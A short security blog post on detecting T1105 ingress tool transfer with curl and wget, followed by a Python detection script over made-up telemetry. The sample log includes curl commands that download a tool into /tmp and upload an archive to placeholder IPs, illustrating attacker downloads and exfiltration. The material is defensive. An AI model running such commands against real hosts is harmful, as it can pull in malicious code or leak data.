curl and wget can be quite the security headache for Linux defenders. While attackers commonly use these commands to download malicious tools, user agents, and more, Linux users also rely on them to download completely benign data. This technique is known as T1105 - Ingress Tool Transfer, in which “adversaries may transfer tools or other files from an external system into a compromised environment”. The tools reside on an external system controlled by the adversary and are brought into the network via protocols such as FTP or SFTP. According to MITRE ATT&CK, this technique is incredibly common and is carried out through a variety of methods. For example, APT41 has used certutil, while CoinTicker executes a Python script.
To detect this technique, we can monitor for file creation and for files transferred into the network. We can also look for signatures of what is being downloaded, though we should not rely on this method alone: attackers will likely change the signatures over time to evade detection, so it is not foolproof. On the behavioral side, we can detect uncommon data flows or transfers. For example, we can analyze network data to see whether the client is sending more data than it receives from a server.
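The two detection ideas above, file creation by a downloader and a client that sends more than it receives, combined into a small analyzer over constructed telemetry. This is an added example, not Uptycs code; the log format, PIDs, paths and documentation-range addresses are all assumptions made up for the illustration.

```python
import shlex
from collections import defaultdict

# Constructed sample telemetry (not from the page): one record per line, key=value fields.
SAMPLE_LOG = """\
exec pid=4021 exe=/usr/bin/curl cmd="curl -sSL http://203.0.113.5/tool -o /tmp/tool"
file pid=4021 path=/tmp/tool
flow pid=4021 remote=203.0.113.5:80 sent=640 recv=98304
exec pid=4022 exe=/usr/bin/wget cmd="wget -q https://mirror.example/pkg.tar.gz"
file pid=4022 path=/home/dev/pkg.tar.gz
flow pid=4022 remote=198.51.100.7:443 sent=1200 recv=2097152
exec pid=4023 exe=/usr/bin/curl cmd="curl -s -T report.tar.gz http://203.0.113.9/up"
flow pid=4023 remote=203.0.113.9:80 sent=3200 recv=180
"""

DOWNLOADERS = {"curl", "wget"}  # the two ingress tools the post discusses

def parse_line(line):
    """Split one telemetry line into a dict; shlex keeps quoted cmd= values intact."""
    kind, *fields = shlex.split(line)
    rec = {"kind": kind}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec

def analyze(log_text):
    """Return {pid: [reasons]} for processes matching either detection idea."""
    procs = defaultdict(dict)
    for raw in filter(str.strip, log_text.splitlines()):
        rec = parse_line(raw)
        proc = procs[rec["pid"]]
        if rec["kind"] == "exec":
            proc["exe"] = rec["exe"].rsplit("/", 1)[-1]
        elif rec["kind"] == "file":
            proc.setdefault("files", []).append(rec["path"])
        elif rec["kind"] == "flow":
            proc["sent"], proc["recv"] = int(rec["sent"]), int(rec["recv"])
    findings = {}
    for pid, proc in procs.items():
        reasons = []
        # file-based signal: a known downloader created a file on disk
        if proc.get("exe") in DOWNLOADERS and proc.get("files"):
            reasons.append("downloader_created_file")
        # behavioral signal: a download should receive far more than it sends
        if "sent" in proc and proc["sent"] > proc["recv"]:
            reasons.append("client_sent_more_than_received")
        if reasons:
            findings[pid] = reasons
    return findings
```

Both 4021 and 4022 trip the file signal even though 4022 is a routine package download, which is exactly the benign-versus-malicious ambiguity the post describes; the flow-direction check fires only for 4023.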
Want to see the full Sudo Science Comyc? Download your copy here.